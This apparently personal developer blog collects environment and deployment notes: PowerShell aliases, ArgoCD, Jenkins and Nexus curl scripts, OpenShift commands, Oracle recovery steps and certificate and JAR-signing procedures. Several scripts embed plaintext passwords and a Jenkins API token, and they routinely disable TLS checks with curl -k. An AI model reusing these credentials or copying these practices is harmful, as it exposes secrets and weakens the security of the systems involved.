My Blog

2022-12-28

2022-12-28

My environment setting

Starship (~/.config/starship.toml)

add_newline = false

[line_break]
disabled = true

[directory]
truncate_to_repo = false
truncation_length  = 5

[character]
success_symbol = "[âžœ](bold green)"

[git_branch]
symbol = "ðŸŒ± "
style = "bold yellow"

Scoop installed apps (~\scoop\shims)

7zip     22.01   main   2022-11-25 20:29:25
adb      33.0.3  main   2022-09-29 18:06:51
dark     3.11.2  main   2022-12-08 17:56:35
fd       8.5.3   main   2022-12-09 10:57:01
fzf      0.33.0  main   2022-09-28 10:35:52
gcc      11.2.0  main   2022-12-13 15:18:08
gitui    0.22.1  main   2022-11-25 20:29:43
lazygit  0.36.0  extras 2022-12-09 11:08:51
llvm     15.0.6  main   2022-12-13 14:47:18
neovim   0.8.1   main   2022-12-09 10:39:39
python   3.11.1  main   2022-12-08 17:57:36
ripgrep  13.0.0  main   2022-12-09 10:59:32
scrcpy   1.24    main   2022-09-29 18:06:57
starship 1.10.3  main   2022-10-14 11:11:06

Powershll $PROFILE

function st {git status .}
function br {git branch @Args}
function di {git difftool @Args}
function ad {git add @Args}
function ci {git commit @Args}
function log {git log --name-only @Args}
function log2 {git log --name-only --grep @Args}
function log3 {git log --graph --pretty=oneline --abbrev-commit --name-only}
function di2 {git difftool head~10 @Args}
function co {git checkout @Args}
function me {git merge --no-ff @Args}
function pi {git cherry-pick @Args}
function pull {git pull origin develop ; echo "pull develop"}
function push {git push origin develop ; echo "push develop"}
function pull2 {git pull origin master ; echo "pull master"}
function push2 {git push origin master ; echo "push master"}
function pull3 {git pull origin sit ; echo "pull sit"}
function push3 {git push origin sit ; echo "push sit"}
function pull4 {git pull origin uat ; echo "pull uat"}
function push4 {git push origin uat ; echo "push uat"}
function pull5 {git pull origin prod ; echo "pull prod"}
function push5 {git push origin prod ; echo "push prod"}

function pu {git push origin @Args}

function kc {kubectl @Args}

function ed {C:\Users\user\Desktop\my\Tool\EditPlus\editplus.exe @Args}

function change-to-develop {co develop}

set-alias cod change-to-develop
set-alias vi nvim

######### zoxide
Invoke-Expression (& {
    $hook = if ($PSVersionTable.PSVersion.Major -lt 6) { 'prompt' } else { 'pwd' }
    (zoxide init --hook $hook powershell | Out-String)
})


######### PSFzf
# Import-Module PSFzf

# Override PSReadLine's history search
# Set-PsFzfOption -PSReadlineChordProvider 'Ctrl+f' `
#                 -PSReadlineChordReverseHistory 'Ctrl+r'

# Override default tab completion
# Set-PSReadLineKeyHandler -Key Tab -ScriptBlock { Invoke-FzfTabCompletion }

# $env:FZF_DEFAULT_OPTS="--height=40% --layout=reverse --info=inline --border --margin=1 --padding=1"

####### color theme
# C:\Users\user\Desktop\my\app\ColorTool\ColorTool.exe solarized_light.itermcolors



Invoke-Expression (&starship init powershell)


Set-PSReadLineKeyHandler -Key Ctrl+b `
-BriefDescription BuildCurrentDirectory `
-LongDescription "Build current project" `
-ScriptBlock {
   [Microsoft.PowerShell.PSConsoleReadLine]::RevertLine()
   [Microsoft.PowerShell.PSConsoleReadLine]::Insert("gradle build -xtest")
   [Microsoft.PowerShell.PSConsoleReadLine]::AcceptLine()
}

Set-PSReadLineKeyHandler -Key Ctrl+p `
-BriefDescription BuildCurrentDirectory `
-LongDescription "Build and publish current project" `
-ScriptBlock {
   [Microsoft.PowerShell.PSConsoleReadLine]::RevertLine()
   [Microsoft.PowerShell.PSConsoleReadLine]::Insert("gradle build publishtomavenlocal")
   [Microsoft.PowerShell.PSConsoleReadLine]::AcceptLine()
}

Set-PSReadLineKeyHandler -Key Ctrl+d `
-ScriptBlock {
   [Microsoft.PowerShell.PSConsoleReadLine]::RevertLine()
   [Microsoft.PowerShell.PSConsoleReadLine]::Insert("exit")
   [Microsoft.PowerShell.PSConsoleReadLine]::AcceptLine()
}


function mem_used {
 $CompObject =  Get-WmiObject -Class WIN32_OperatingSystem
 $Memory = ((($CompObject.TotalVisibleMemorySize - $CompObject.FreePhysicalMemory)*100)/ $CompObject.TotalVisibleMemorySize)

 Write-Host "Memory usage in Percentage:" $Memory

 # Top 10 process Memory Usage (MB)
 $processMemoryUsage = Get-WmiObject WIN32_PROCESS | Sort-Object -Property ws -Descending | Select-Object -first 10 processname, @{Name="Mem Usage(MB)";Expression={[math]::round($_.ws / 1mb)}}
 $processMemoryUsage
}

function battery {
  WMIC PATH Win32_Battery Get EstimatedChargeRemaining
}


####### fzf
function fe { fzf | %{ ed $_ } }


####### shortcut
set-alias lg lazygit
set-alias gt gitui

Scripts

synchronize argocd (sy)

SERVICE_SHORT_FORM=$1
ARGOCD_TOKEN=$(curl -s https://argocd.apps.xxxp2-dev.local/api/v1/session  -k -d '{"username":"my","password":"x1xrhqbwdg"}' | jq -r .token)

echo $ARGOCD_TOKEN

case $SERVICE_SHORT_FORM in
        l)
        SERVICE=login-service ;;
        o)
        SERVICE=operation-service ;;
esac

curl -XPOST https://argocd.apps.xxxp2-dev.local/api/v1/applications/$SERVICE/sync  -H "Authorization: Bearer $ARGOCD_TOKEN" -k|jq .status.sync

set image (si)

SERVICE_SHORT_FORM=$1
DIGEST=$2

case $SERVICE_SHORT_FORM in
        l)
        SERVICE=login-service ;;
        o)
        SERVICE=operation-service ;;
esac

kubectl set image deployment/$SERVICE $SERVICE=repo.xxxp2-dev.local:5000/$SERVICE@sha256:$2

build Jenkins (bu)

SERVICE_SHORT_FORM=$1

case $SERVICE_SHORT_FORM in
        c)
        SERVICE=common-library ;;
        l)
        SERVICE=login-service ;;
        o)
        SERVICE=operation-service ;;
esac

case $2 in
        d)  ENV=develop ;;
        s)  ENV=sit ;;
        u)  ENV=uat ;;
        p)  ENV=prod ;;
esac

#echo "build $SERVICE env: " $ENV
#curl -k -X POST -FSubmit=Build -u my:11e3706cf992e438dff8212e261a99e645 https://ci.xxxp2-dev.local/job/$SERVICE/buildWithParameters?environment=$ENV

echo "build $SERVICE env: " $ENV
if [[ -z "$ENV" ]]
then
  curl -k -X POST -FSubmit=Build -u my:11e3706cf992e438dff8212e261a99e645 https://ci.xxxp2-dev.local/job/$SERVICE/build
else
  curl -k -X POST -FSubmit=Build -u my:11e3706cf992e438dff8212e261a99e645 https://ci.xxxp2-dev.local/job/$SERVICE/buildWithParameters?environment=$ENV
fi

build process in Jenkins (bp)

SERVICE_SHORT_FORM=$1

case $SERVICE_SHORT_FORM in
        c)
        SERVICE=common-library ;;
        l)
        SERVICE=login-service ;;
        v)
esac


curl -s -k -X POST -FSubmit=Build -u my:11e3706cf992e438dff8212e261a99e645 https://ci.xxxp2-dev.local/job/$SERVICE/lastBuild/api/xml?tree=building,timestamp,estimatedDuration|xq
#curl -s -k -X POST -FSubmit=Build -u my:11e3706cf992e438dff8212e261a99e645 https://ci.xxxp2-dev.local/job/common-api/lastBuild/api/json|jq .artifacts

show logs for k8s pod (po)

kubectl get pods  | fzf --info=inline --layout=reverse --header-lines=1 \
      --bind 'enter:execute:kubectl logs -f {1}' \
      --preview-window up:follow \
      --preview 'kubectl logs --follow --tail=100 {1}' "$@"

2022-04-15

2022-04-15

Gradle build publish / Curl to Nexus

Publish/upload artifacts with Gradle or curl

gradle build publish -Djavax.net.ssl.trustStore=C:\Users\user\Desktop\me\workspace\me\kw-cacerts -Djavax.net.ssl.trustStorePassword=changeit -PNEXUS_REPO_URL=https://repo.2pswt.local:8443/repository/maven-releases/ -PNEXUS_REPO_USER=me -PNEXUS_REPO_PASSWORD=abc123.


Direct upload
curl -x socks5h://localhost:8580 -k -v -u me:my-passwd --upload-file httpcore-4.4.12.pom https://repo.2pswt.local:8443/repository/maven-releases/org/apache/httpcomponents/httpcore/4.4.12/httpcore-4.4.12.pom

curl -x socks5h://localhost:8580 -k -v -u me:my-passwd --upload-file spring-data-redis-2.5.6.jar https://repo.2pswt.local:8443/repository/maven-releases/org/springframework/data/spring-data-redis/2.5.6/spring-data-redis-2.5.6.jar

Upload jar with auto generating pom.xml
curl -x socks5h://localhost:8580 -k -v -u me:my-passwd -F "maven2.generate-pom=true" -F "maven2.groupId=spring-data-redis" -F "maven2.artifactId=spring-data-redis" -F "maven2.packaging=jar" -F "version=2.5.6" -F "maven2.asset1=@spring-data-redis-2.5.6.jar;type=application/java-archive" -F "maven2.asset1.extension=jar" "https://repo.2pswt.local:8443/service/rest/v1/components?repository=maven-releases"

Upload jar and pom.xml (failed)
curl -x socks5h://localhost:8580 -k -v -u me:my-passwd -F "maven2.generate-pom=false" -F "maven2.asset1=@spring-data-redis-2.5.6.pom" -F "maven2.asset1.extension=pom" -F "maven2.asset2=@spring-data-redis-2.5.6.jar;type=application/java-archive" -F "maven2.asset2.extension=jar" "http://repo.2pswt.local:8443/service/rest/v1/components?repository=maven-releases"

Using sock5 proxy to clone git repo

git clone https://git.2pwst.local/wst-dev/xxx-service --config "http.proxy=socks5://127.0.0.1:8580"

git config --global https.proxy "socks5://127.0.0.1:8080"
git config --global --unset http.proxy
git config --global --unset https.proxy

Reference
https://help.sonatype.com/repomanager3/integrations/rest-and-integration-api/components-api
https://help.sonatype.com/repomanager3/integrations/rest-and-integration-api/search-api

package hk.gov.cedb.tsw.upload;

import java.io.BufferedWriter;
import java.io.FileWriter;
import java.io.IOException;
import java.nio.file.FileVisitOption;
import java.nio.file.Files;
import java.nio.file.Paths;

import org.apache.commons.lang3.StringUtils;

public class UploadArtificatToNexus {
    static String gradleCacheDir = "C:\\Users\\user\\.gradle\\caches\\modules-2\\files-2.1\\com.squareup.okhttp3"; // append folder name here for upload specified package e.g. io.projectreactor

    static String filterVersion = ""; // e.g. 3.4.18

    static String repoUser = "me";
    static String repoPwd = "my-passwd";

    // clear gradle cache in server, rm -rf $HOME/.gradle/caches/

    static String uploadJarScript = "curl -x socks5h://localhost:8580 -k -v -u " + repoUser + ":" + repoPwd + " -F \"maven2.generate-pom=false\" "
            + "-F \"maven2.groupId=%s\" -F \"maven2.artifactId=%s\" -F \"maven2.packaging=jar\" "
            + "-F \"version=%s\" -F \"maven2.asset1=@%s;type=application/java-archive\" "
            + "-F \"maven2.asset1.extension=jar\" \"https://repo.tswp2-dev.local:8443/service/rest/v1/components?repository=maven-releases\"";

    static String uploadPomScript = "curl -x socks5h://localhost:8580 -k -v -u " + repoUser + ":" + repoPwd + " --upload-file %s "
            + "https://repo.tswp2-dev.local:8443/repository/maven-releases/%s/%s/%s/%s";

    static String uploadNpmScript = "curl -x socks5h://localhost:8580 -k -v -u " + repoUser + ":" + repoPwd
            + " -F \"npm.asset=@C:\\Users\\user\\Downloads\babel-plugin-11.9.2.tgz;type=application/x-compressed\" "
            + "https://repo.tswp2-dev.local:8443/service/rest/v1/components?repository=npm-releases";

    public static void main(String[] args) throws IOException {
        uploadArtifact();
    }

    private static void uploadArtifact() throws IOException {
        BufferedWriter fw = new BufferedWriter(new FileWriter("d:/artifacts.txt"));
        try {
            Files.walk(Paths.get(gradleCacheDir),
                    FileVisitOption.FOLLOW_LINKS).forEach(f -> {
                        try {
                            if (f.toFile().isDirectory()) {
                                return;
                            }

                            String fileName = f.getFileName().toString();

                            if (fileName.contains("source")) {
                                return;
                            }

                            String version = f.getParent().getParent().toFile().getName();

                            if (StringUtils.isNotBlank(filterVersion) && !filterVersion.equals(version)) {
                                return;
                            }

                            String artifactId = f.getParent().getParent().getParent().toFile().getName();

                            String groupId = f.getParent().getParent().getParent().getParent().toFile().getName();

                            // System.out.println(String.format("%s/%s/%s/%s", groupId.replaceAll("\\.", "/"), artifactId, version, fileName));

                            if (fileName.endsWith(version + ".jar")) {
                                String line = String.format(uploadJarScript, groupId, artifactId, version, f.toAbsolutePath().toAbsolutePath());
                                System.out.println(line);
                                fw.append(line + "\r\n");
                            }

                            if (fileName.endsWith(version + ".pom")) {
                                String line = String.format(uploadPomScript, f.toAbsolutePath(), groupId.replaceAll("\\.", "/"), artifactId, version, fileName);
                                System.out.println(line);
                                fw.append(line + "\r\n");
                            }

                            fw.flush();
                        } catch (IOException e) {
                            e.printStackTrace();
                        }
                    });

            fw.close();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

2022-01-23

2022-01-23

k8s poc

A very prilimiary project for proof of concept on following items,

Support multiplie user login
(re-implement session managment logic without spring-session and spring-security)
Concurrent update control

Prerequisites

JDK 11+

Gradle 6.8

NodeJS v14

H2 DB v1.4.199

Redis 3.2

MariaDB Server 10.6 (Optional)

MySQL Workbench 8.0 CE

Docker Desktop (Optional)

To setup the environment and run the demo

Add below entry at C:\Windows\System32\drivers\etc\hosts

127.0.0.1	xxx.local.hk
127.0.0.1	session-service.local.hk
127.0.0.1	login-service.local.hk
127.0.0.1	profile-service.local.hk
127.0.0.1	redis-server.local.hk
127.0.0.1	mariadb-server.local.hk
127.0.0.1	h2db-server.local.hk

MariaDB (Optional)

Download and install MariaDB
Run the scripts in file config\MariaDB\create-db.txt to create database and data initialization.

H2 DB

Go to config\h2 folder and run the script h2_server.bat in command prompt
Run below scripts to create database file in baseDir defined in h2_server.bat
java -cp h2-1.4.199.jar org.h2.tools.Shell

Welcome to H2 Shell 1.4.199 (2019-03-13)
Exit with Ctrl+C
[Enter]   jdbc:h2:tcp://localhost/~/test
URL       jdbc:h2:c:/Users/user/test
[Enter]   org.h2.Driver
Driver
[Enter]   sa
User
Password
Type the same password again to confirm database creation.
Password
Connected
Commands are case insensitive; SQL statements end with ';'
help or ?      Display this help
list           Toggle result list / stack trace mode
maxwidth       Set maximum column width (default is 100)
autocommit     Enable or disable autocommit
history        Show the last 20 statements
quit or exit   Close the connection and exit

Run the scripts in file config\MariaDB\create-db.txt to create tables and data initialization.

Redis

Download and install Redis
Backup the redis.windows-service.conf file in Redis Installation folder and replace it with config\redis\redis.windows-service.conf
Run following commands with Adminstrator permission
net stop redis && net start redis

Go to session-service directory and run below script in command prompt

gradle build && java -Dcommon.properties=..\config\common.properties -jar build\libs\session-service-1.0.war

gradle build && java -Dcommon.properties=..\config\common.properties -jar build\libs\login-service-1.0.war

Go to profile-service directory and run below script in command prompt

gradle build && java -Dcommon.properties=..\config\common.properties -jar build\libs\profile-service-1.0.war

Go to frontend directory and run below script in command prompt

1 2	npm install npm start

The project is also able to build and run with docker

Build the services session-service, login-service and profile-service respectively by using Gradle
Go to directory container and run following commands
Build all images by command build-all.bat
Startup the application by command startup-all.bat
Create tables USER and SESSION, and corresponding records in MariaDB via MySQL Workbench
Refer to above H2 DB section, create database, table and records

Test the application

Open a new browser tab or window with the URL http://xxx-poc:3000/login in your address bar.
To view the database structure open MySQL Workbench and input connection information from file config\mariadb\create-db.sql.

Next…

Deploy the code to OKD, minikube, CodeReady Containers and KinD later

Fix problem of PullImageErr even successfully validate new docker image from external registry for deployment

Add imagePullSecret under below YAML

Administrator -> User Management -> Service Accounts -> default -> YAML
imagePullSecrets:
  - name: default-dockercfg-49c54
  - name: repo-secrect (it comes from Workloads -> Secrets)

Or run following script

openshift-deploy-an-application-from-private-registry
service_accounts in openshift
image-pull-secrets

oc create secret docker-registry repo-secrect \
    --docker-server=repo.lab.company.com \
    --docker-username=<user_name> \
    --docker-password=<password> \
    --docker-email=unused
```      

`oc secrets link default repo-secrect --for=pull`

## Manage and deploy containers in OKD platform  
* Following commands come from  
https://design.jboss.org/redhatdeveloper/marketing/openshift_cheatsheet/cheatsheet/images/openshift_cheat_sheet_r2v1.pdf  
https://gist.github.com/rafaeltuelho/111850b0db31106a4d12a186e1fbc53e

oc login
oc status
oc logs
oc describe pod
oc describe svc
oc get is
oc get pods
oc get svc
oc get routes
oc get deployment
oc del is
oc del pod
oc exec cat /opt/app-root/myapp.config
oc rsh
oc debug dc

Redeploy images from repo.lab.company.com

oc delete deployment frontend
oc delete svc frontend
oc delete is frontend
oc delete route frontend

Check service account

oc describe sa

Create deployment

oc new-app repo.lab.company.com/myname/xxx-poc/login-service:latest –name=my-application
oc delete deployment application


* odo commands from  
https://odo.dev/docs/getting-started/basics  
https://docs.openshift.com/container-platform/4.9/cli_reference/developer_cli_odo/understanding-odo.html

odo login -umyname
odo project create quickstart
odo catalog list services


* add configmap
```  
oc create configmap xxx-poc-config --from-env-file=common.properties --dry-run=client -o yaml > configMap.yml
oc create configmap xxx-poc-config --from-file=common.properties
oc apply -f configMap.yml

oc describe configmap xxx-poc-config 

oc get configmap xxx-poc-config -o yaml

----
oc delete configmap xxx-poc-config2

oc get deployment session-service  -o yaml > orig-deployment.txt
oc apply -f add-configmap-deployment.yaml

2021-09-30

2021-09-30

Recover inconsistent/corrupt data file in Oracle DB

Fix: ORA-01194: file 1 needs more recovery to be consistent

SQL> sqlplus sys/sys as sysdba

SQL> alter database open resetlogs;

SQL> recover database using backup controlfile until cancel;
...
Specify log: {<RET>=suggested | filename | AUTO | CANCEL}
AUTO

SQL> alter database open resetlogs;

SQL> shutdown immediate

SQL> startup mount

SQL> ALTER SYSTEM SET "_allow_resetlogs_corruption"= TRUE SCOPE = SPFILE;
SQL> ALTER SYSTEM SET undo_management=MANUAL SCOPE = SPFILE;

SQL> shutdown immediate

SQL> startup mount

SQL> alter database open resetlogs;
Database altered.

SQL> CREATE UNDO TABLESPACE undo2 datafile 'D:\oraclexe\app\oracle\oradata\XE\undo2_df1.dbf' size 200m autoextend on maxsize 20G;
Tablespace created.

SQL> alter system set undo_tablespace = undo2 scope=spfile;
System altered.

SQL> alter system set undo_management=auto scope=spfile;
System altered.

SQL> shutdown immediate
SQL> startup

Reference:
https://dbatricksworld.com/ora-01194-file-1-needs-more-recovery-to-be-consistent/
http://blog.itpub.net/77164/viewspace-668388/
https://stackoverflow.com/questions/53676/how-to-resolve-ora-011033-oracle-initialization-or-shutdown-in-progress

2019-10-10

2019-10-10

Install Certificate From Let's Encrypt To Tomcat

Got 3 files from https://www.sslforfree.com/

1
2
3

certificate.crt
ca_bundle.crt
private.key

Web server is tomcat, merge those files into a keystore

openssl pkcs12 -export -in certificate.crt -inkey private.key -certfile certificate.crt -out testkeystore.p12

keytool -importkeystore -srckeystore testkeystore.p12 -srcstoretype pkcs12 -destkeystore ks.jks -deststoretype JKS

keytool -changealias -keystore ks.jks -alias 1
=> alias: tomcat

password: lles1234

keytool -import -trustcacerts -alias root -file ca_bundle.crt -keystore ks.jks

keytool -import -trustcacerts -alias lles -file certificate.crt -keystore ks.jks

Test the cert

1	openssl s_connect -showcerts -connect 127.0.0.1:443

server.xml

<Connector port="443" protocol="HTTP/1.1"
SSLEnabled="true"
scheme="https" secure="true" clientAuth="false"
sslProtocol="TLS" keystoreFile="/your_path/ks.jks"
keystorePass="lles1234" />

Reference:
https://www.sslforfree.com/#tutorials
https://www.namecheap.com/support/knowledgebase/article.aspx/9423/33/installing-an-ssl-certificate-on-apache
https://www.namecheap.com/support/knowledgebase/article.aspx/9441/33/installing-an-ssl-certificate-on-tomcat
https://www.cyberciti.biz/faq/test-ssl-certificates-diagnosis-ssl-certificate/

2019-05-08

2019-05-08

Sign Jar

generate certitficate signing request

keytool -certreq -alias xxx -keystore xxx_signing.jks -file certreq.pem.2
keytool -importcert -alias inter   -file intermediate.pem  -keystore xxx_signing.jks -storepass yyy.xxx@2017
keytool -importcert -alias root    -file root.pem          -keystore xxx_signing.jks -storepass yyy.xxx@2017
keytool -importcert -alias xxx  -file signedcert.pem    -keystore xxx_signing.jks -storepass yyy.xxx@2017

print certificate request

1 2	keytool -printcertreq -file certreq.pem openssl req -in certreq.pem -noout -text

sign jnlp jar

D:\signjar> mkdir hk\gov\ogcio
D:\signjar> mkdir hk\gov\xxx\user\fxbrowser

xxx\public\bin> 
xcopy /y hk\gov\ogcio /s D:\signjar\bin\hk\gov\ogcio
xcopy /y hk\gov\xxx\user\fxbrowser /s D:\signjar\bin\hk\gov\xxx\user\fxbrowser
copy smartid.properties D:\signjar\bin
copy pkcs12.properties D:\signjar\bin
copy etoken.properties D:\signjar\bin 

jar -cf fxbrowser.jar -C bin/ .
jar ufm fxbrowser.jar Manifest.txt
pack200 --repack fxbrowser.jar
// pack200 --repack itextpdf-5.5.6.jar
// pack200 --repack bcprov-jdk15on-1.56.jar
// pack200 --repack bcpkix-jdk15on-1.56.jar

jarsigner -tsa http://sha256timestamp.ws.symantec.com/sha256/timestamp -keystore xxx_signing.jks fxbrowser.jar xxx -storepass yyy.xxx@2017
jarsigner -tsa http://sha256timestamp.ws.symantec.com/sha256/timestamp -keystore xxx_signing.jks itextpdf-5.5.6.jar xxx -storepass yyy.xxx@2017
jarsigner -tsa http://sha256timestamp.ws.symantec.com/sha256/timestamp -keystore xxx_signing.jks bcprov-jdk15on-1.56.jar xxx -storepass yyy.xxx@2017
jarsigner -tsa http://sha256timestamp.ws.symantec.com/sha256/timestamp -keystore xxx_signing.jks bcpkix-jdk15on-1.56.jar xxx -storepass yyy.xxx@2017

pack200 fxbrowser.jar.pack.gz fxbrowser.jar
pack200 itextpdf-5.5.6.jar.pack.gz itextpdf-5.5.6.jar
pack200 bcprov-jdk15on-1.56.jar.pack.gz bcprov-jdk15on-1.56.jar
pack200 bcpkix-jdk15on-1.56.jar.pack.gz bcpkix-jdk15on-1.56.jar

del fxbrowser__V1.4.jar.pack.gz
rename fxbrowser.jar.pack.gz fxbrowser__V1.4.jar.pack.gz
rename itextpdf-5.5.6.jar.pack.gz itextpdf-5.5.6__V1.0.jar.pack.gz
rename bcprov-jdk15on-1.56.jar.pack.gz bcprov-jdk15on-1.56__V1.0.jar.pack.gz
rename bcpkix-jdk15on-1.56.jar.pack.gz bcpkix-jdk15on-1.56__V1.0.jar.pack.gz

copy /y fxbrowser__V1.4.jar.pack.gz C:\Users\my\Desktop\Forrest\workspace\xxx\public\src\main\resources\public\user
copy /y fxbrowser__V1.4.jar.pack.gz Y:\public\bin\public\user

Reference

https://docs.oracle.com/cd/E19509-01/820-3503/ggezu/
https://blogs.oracle.com/blogbypuneeth/steps-to-create-a-csr-certificate-signing-request-using-keytool-and-get-it-signed-from-an-external-ca-certificate-authority-thawte
http://docs.oracle.com/javase/7/docs/technotes/guides/jweb/security/rsa_signing.html

Import certificate

1	keytool -import -trustcacerts -keystore xxx_signing.jks -alias xxx -file ssl_certificate.p7b

Add key entry to xxx_signing.jks for pdf signing

useless:
 openssl pkcs12 -export -inkey www.dummy.gov.hk-privateKey.key -in www.dummy.gov.hk.crt -name xxx-cert -out xxx-cert.p12
 keytool -importkeystore -srckeystore ..\apache\ssl\public\xxx-cert.p12 -srcstoretype pkcs12 -alias xxx-cert -destkeystore xxx_signing.jks

self-sign:
  openssl req -x509 -newkey rsa:2048 -keyout sign-pdf-cert-key.pem -out sign-pdf-cert.pem -days 3650
  openssl x509 -text -noout -in sign-pdf-cert.pem (review cert)
  openssl pkcs12 -inkey sign-pdf-cert-key.pem -in sign-pdf-cert.pem -export -name xxx-cert -out sign-pdf-cert.p12
  openssl pkcs12 -in certificate.p12 -noout -info (validate p12 file)
  keytool -importkeystore -srckeystore sign-pdf-cert.p12 -srcstoretype pkcs12 -alias xxx-cert -destkeystore xxx_signing.jks

jks location

1	D:\keystore\xxx_signing.jks comes from public\config\jws\xxx_signing.jks

2019-05-08

2019-05-08

Generate SSL Cert

generate private key

1	openssl genrsa -out xxx-privateKey.key 2048``` no passphase to protect private key

generate public certificate for domain of dummy.gov.hk

1 2	1. openssl req -out xxx.csr -new -newkey rsa:2048 -sha256 -nodes -key xxx-privateKey.key 2. openssl req -text -noout -verify -in xxx.csr

re-generate csr with same private key

1
2

3. openssl req -new -sha256 -nodes -out www.dummy.gov.hk.csr -key www.dummy.gov.hk-privateKey.key -config config.txt
4. openssl req -text -noout -verify -in www.dummy.gov.hk.csr > www.dummy.gov.hk.csr.verify.txt

generate private key for internal certificate for domain of *.dummy.hksarg

1 2	1. openssl req -new -sha256 -nodes -out dummy.hksarg.csr -newkey rsa:2048 -keyout xxx.hksarg-privateKey.key -config config.txt 2. openssl req -text -noout -verify -in dummy.hksarg.csr

generate 3 internal certificates for domain of *.dummy.hksarg by one private key

1. openssl req -new -sha256 -nodes -out sit.dummy.hksarg.csr -key xxx.hksarg-privateKey.key -config config.txt
2. openssl req -text -noout -verify -in sit.dummy.hksarg.csr > sit.xxx.hksarg.csr.verify.txt

1. openssl req -new -sha256 -nodes -out uat.dummy.hksarg.csr -key xxx.hksarg-privateKey.key -config config.txt
2. openssl req -text -noout -verify -in uat.dummy.hksarg.csr > uat.xxx.hksarg.csr.verify.txt

1. openssl req -new -sha256 -nodes -out dummy.hksarg.csr -key xxx.hksarg-privateKey.key -config config.txt
2. openssl req -text -noout -verify -in dummy.hksarg.csr > dummy.hksarg.csr.verify.txt

convert p7b cert format to PEM

1
2
3

openssl pkcs7 -print_certs -inform der -in certnew-der.p7b > sit.dummy.hksarg.crt
openssl pkcs7 -print_certs -inform der -in certnew-der.p7b > uat.dummy.hksarg.crt
openssl pkcs7 -print_certs -inform der -in certnew-der.p7b > dummy.hksarg.crt

conbime cert and cacert

openssl x509 -in cert0002107503.cer -subject -issuer -out cert0002107503.crt
openssl x509 -in ecert_ca_1-15_pem.crt -subject -issuer -out ecert_ca_1-15_pem.crt
openssl x509 -in root_ca_1_pem.crt -subject -issuer -out root_ca_1_pem.crt

cat cert0002107503.crt ecert_ca_1-15_pem.crt root_ca_1_pem.crt > www.dummy.gov.hk.crt

2019-05-08

2019-05-08

Instal RM

Export some dependencies like org.dom4j and javax.jms.api in jboss-deployment-structure.xml

egis_rm_paymentrecon-dept_web
<jboss-deployment-structure xmlns="urn:jboss:deployment-structure:1.1">
	<deployment>
		<resources>
			<resource-root path="lib/bcprov-jdk15on-1.51.jar" use-physical-code-source="true"/>
		</resources>
		<dependencies>
			<!-- for quartz -->
			<module name="com.mysql" export="true"/>
		</dependencies>
	</deployment>
</jboss-deployment-structure>

egis_rm_paymentrecon-portal_web
<jboss-deployment-structure xmlns="urn:jboss:deployment-structure:1.2">
	<deployment>
		<dependencies>
			<!-- for castor, don't know which XML serializer is configured -->
			<!-- therefore, include both from JDK and Xerces -->
			<system export="true">
				<paths>
					<path name="com/sun/org/apache/xml/internal/serialize" />
				</paths>
			</system>

			<module name="org.apache.xalan" export="true" />
			<module name="org.apache.xerces" export="true" />
			<module name="org.dom4j" export="true" />

			<!-- for quartz -->
			<module name="com.mysql" export="true" />
		</dependencies>
	</deployment>
</jboss-deployment-structure>

Add application user for role keyservice_admin by calling bin/add-user.bat

Update standalone.conf to add RM config path

1	set "JAVA_OPTS=%JAVA_OPTS% -Dhk.gov.ogcio.egis.rm.common.PROPERTIES_FILEPATH=D:\rm -Djboss.bind.address=0.0.0.0 -Dspring.profiles.active=uat"

Generate key store

keytool -genkey -keystore xxx_master.jks -keyalg RSA -keysize 2048 -alias my-alais -validity 3650 -storepass yyy.xxx@2017
*** CN=Companies Registry, OU=Companies Registry, O=Companies Registry, L=Hong Kong, ST=Hong Kong, C=HK ***
keytool -list -v -keystore xxx_master.jks

Copy xxx\rm2\keys\sit\xxx_master.jks to d:/keystore

Generate master password in DB
java -cp C:\Users\xxx01\Desktop\Forrest\workspace\RM2-Keyservice\bin;C:\Users\xxx01\Desktop\Forrest\workspace\RM2-Common\bin hk.gov.ogcio.egis.rm.keyservice.utils.KeystoreInstallSuite /d:/keystore/xxx_master.jks JKS yyy.xxx@2017 my-alais yyy.xxx@2017 SHA256 RSA/ECB/OAEPWithSHA1AndMGF1Padding

INSERT INTO PASSWORD_STORE(PASSWORD_STORE_ID, USER_ID, USAGE_TYPE, PASSWORD, SIGNATURE, LAST_UPDATE_DT) VALUES ('0', 'MASTER_PASSWORD', 'INTERNAL', 'xzn+q7+DcT/Z2eTHVDDO9WRia4R/CHP23cU2bA9Eatgh6xA6Ah5qaK6CTf93ILT+C8ezhDMAe0/IdU916ExB8+iXozYKNnBp5/g4YpvzGYDcsYM6GnH5KA3YZY6EchRjXw1P576m5jQdMY6bQmcdEg7bB1JwufkISneQV1SnpuKev9G4O2oTHamyvaGuAxtj1lWm5we4AmBgGD6hF75ZAdu/IKL2n5h1BflT61jcSCrTYW0yCkWR0JFoN+x7eM3WGBZcw/BDWpIAfxVR6O0hJTkw6S6SDM6kheusfpzc36wcBrxP2yG/Jp+TZVWpSKDxCkLaM+i68K8wonEkQO0nBQ==', 'DeKWX8F/81JGQWeKowS5KsWNu2Poid7w+nDyC3IFRkdjNxAO+yqgKt9GX6QjAa3C61PtbMvPKxzfRjqZZeCx5aUbN+S4FCjKW8b4y8EZxI1TOSc31W6Je2McBxSRqqNPbB382W4lP+K7BXFIC0MS5PGtx+ES28k+rfLJcoRHzlhHKgkXUSIknPfWzLOzGJsg3DFynDXMoH3Jc7lZ2QRWZ2lmfqHm1rPGBfpg6W3YFzFDxJaA/U36A4xrGsYBja3v7+QLQFH7CtvF7XBWAN3HZpBylY8z/5MhMvwo+sj0dVc7z7Q2RLTd1ID0E2C6jI1CKLfLc2SKnho8phzT8xX8rg==', now());

Add support for HKPOST_TRIAL cert for testing in webserver.properties

Payment and Payment Reconciliation

generate privateKeyEntry (friendly3)
  openssl pkcs12 -export -inkey my.hksarg-privateKey.key -in sit.xxx.cr.hksarg.crt -name friendly3 -out friendly3.p12
  keytool -importkeystore -srckeystore friendly3.p12 -srcstoretype pkcs12 -alias friendly3 -destkeystore xxx_egis.jks

 UAT renew:
   keytool -v -list -keystore xxx_egis.jks -alias friendly3 -storepass yyy.xxx@2017
   keytool -delete -keystore xxx_egis.jks -alias friendly3 -storepass yyy.xxx@2017
   openssl pkcs12 -export -inkey my.hksarg-privateKey.key -in uat.my.cr.hksarg.crt -name friendly3 -out friendly3.p12
   keytool -importkeystore -srckeystore friendly3.p12 -srcstoretype pkcs12 -alias friendly3 -destkeystore xxx_egis.jks

Generate trustedCertEntry (epayment_signing)
  keytool -genkey -keystore payment_signing.jks -keyalg RSA -keysize 2048 -validity 3650 -storepass yyy.xxx@2017
